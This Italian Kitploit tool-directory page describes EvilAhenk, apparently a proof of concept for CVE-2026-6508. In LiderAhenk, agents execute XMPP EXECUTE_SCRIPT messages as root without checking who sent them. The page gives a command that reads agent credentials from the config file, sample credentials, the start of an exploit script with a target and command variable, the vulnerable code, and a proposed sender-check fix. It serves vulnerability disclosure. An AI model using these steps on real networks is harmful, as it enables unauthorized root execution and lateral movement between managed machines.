Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
EvilAhenk — CVE-2026-6508 Vulnerabilità di sicurezza critica nell'architettura del Sistema di Gestione Centralizzato LiderAhenk che consente a tutti i clienti tra le unità periferiche (agenti) di eseguire codice con privilegi 'root' gli uni sugli altri (unauthorized rce & lateral movement). | Kitploit
Strumenti/GitHubGitHub/jackalkarlos/evilahenk
Escalation di PrivilegiGenerazione di PayloadAnalisi delle VulnerabilitàExploitMovimento LateralePost-ExploitPenetration TestingCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubjackalkarlos/evilahenk
21 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

EvilAhenk

CVE-2026-6508 Vulnerabilità di sicurezza critica nell'architettura del Sistema di Gestione Centralizzato LiderAhenk che consente a tutti i clienti tra le unità periferiche (agenti) di eseguire codice con privilegi 'root' gli uni sugli altri (unauthorized rce & lateral movement).

Vedi Repository

CVE-2026-6508

EvilAhenk è una vulnerabilità di sicurezza critica nell'architettura del sistema di gestione centralizzata LiderAhenk che consente a tutti i client (agenti) di eseguire codice con privilegi 'root' gli uni sugli altri (Unauthorized RCE & Lateral Movement).

Come funziona il sistema

In LiderAhenk, il pannello di amministrazione/server centrale invia messaggi di attività e policy ai client tramite XMPP.

  • Il Pannello di Gestione Centrale si connette al server XMPP con un utente autorizzato,
  • Anche gli agent ahenk sui client si connettono alla stessa infrastruttura XMPP,
  • Il centro invia al client target messaggi come EXECUTE_POLICY, EXECUTE_TASK o EXECUTE_SCRIPT
  • L'agente client riceve e applica questi messaggi

Quindi XMPP qui è il canale di trasporto del traffico di gestione. Normalmente i comandi del pannello centrale raggiungono i client attraverso questo canale.

Differenza tra flusso previsto e flusso vulnerabile

Flusso previsto:

root@kitploit:~
Lider/Ahenk yonetim paneli -> XMPP sunucusu -> hedef agent

Flusso vulnerabile:

  • ct-2 è un client valido connesso allo stesso server XMPP
  • ct-2 invia un messaggio EXECUTE_SCRIPT tramite il server XMPP prendendo di mira il JID di ct-1
  • Il server XMPP inoltra il messaggio a ct-1
  • ct-1 esegue il comando senza verificare che il messaggio provenga realmente da lider_sunucu
  • Il comando viene eseguito come root perché ahenk.service viene eseguito come root
root@kitploit:~
ct-2 veya baska bir XMPP hesabi -> XMPP sunucusu -> ct-1 agent -> root komut

Quindi non stiamo hackerando il livello XMPP. Il server XMPP esegue il normale instradamento dei messaggi. Il problema è che l'agente Ahenk lato ct-1 non verifica se il messaggio in arrivo provenga realmente dall'account di gestione autorizzato.

PoC

root@kitploit:~
pip install slixmpp

Da un client compromesso e connesso al sistema di gestione centralizzata vengono raccolte informazioni come le seguenti:

root@kitploit:~
sudo grep -E '^(uid|password|host|port|servicename|receiverjid|use_tls)' /etc/ahenk/ahenk.conf

Esempio di output;

root@kitploit:~
uid = pardus-ct-2
password = e0c5a52e-36c2-31fc-ad0b-e9ceabbf3401
host = 192.168.100.13
port = 5222
use_tls = false
receiverjid = lider_sunucu
servicename = im.liderahenk.org

Aggiorniamo il file Main.py in base alle informazioni ottenute; dominio im.liderahenk.org, uid target pardus-ct-1.

root@kitploit:~
- XMPP user: `[email protected]`
- XMPP password: `e0c5a52e-36c2-31fc-ad0b-e9ceabbf3401`
- XMPP host: `192.168.100.13`
- XMPP port: `5222`
- Varsayilan hedef: `[email protected]`

Il comando da eseguire sulla macchina vittima può essere modificato cambiando la variabile COMMAND.

root@kitploit:~
root@pardus-ct-2:/home/pardus-ct-2# cat xp.py | head -n 11
#!/usr/bin/env python3
import asyncio
import json
from slixmpp import ClientXMPP

XMPP_USER = "[email protected]"
XMPP_PASS = "e0c5a52e-36c2-31fc-ad0b-e9ceabbf3401"
TARGET_JID = "[email protected]"
XMPP_HOST = "192.168.100.13"
XMPP_PORT = 5222
COMMAND = "id > /tmp/who; false"

Codice vulnerabile

In repos/ahenk/src/base/messaging/messenger.py, il messaggio in arrivo viene elaborato solo in base al campo type. Non c'è alcun controllo del mittente autorizzato per msg['from']:

root@kitploit:~
def recv_direct_message(self, msg):
    if msg['type'] in ['normal']:
        j = json.loads(str(msg['body']))
        message_type = j['type']
        self.event_manger.fireEvent(message_type, str(msg['body']))

In repos/ahenk/src/base/execution/execution_manager.py, invece, EXECUTE_SCRIPT porta direttamente all'esecuzione del comando:

root@kitploit:~
def execute_script(self, arg):
    json_data = json.loads(arg)
    result_code, p_out, p_err = Util.execute(str(json_data['command']))

Quando queste due parti si combinano, l'effetto è il seguente:

  • Il server XMPP consegna il messaggio al target
  • L'agente vittima attiva l'evento EXECUTE_SCRIPT senza verificare il mittente
  • Il comando viene eseguito come root

Possibile fix progettuale;

root@kitploit:~
def recv_direct_message(self, msg):
    if msg['type'] != 'normal':
        return

    allowed_sender = self.receiver.split('/')[0]
    actual_sender = msg['from'].bare
    if actual_sender != allowed_sender:
        self.logger.warning("Rejected message from %s", actual_sender)
        return

    j = json.loads(str(msg['body']))
    self.event_manger.fireEvent(j['type'], str(msg['body']))
Scarica lo strumento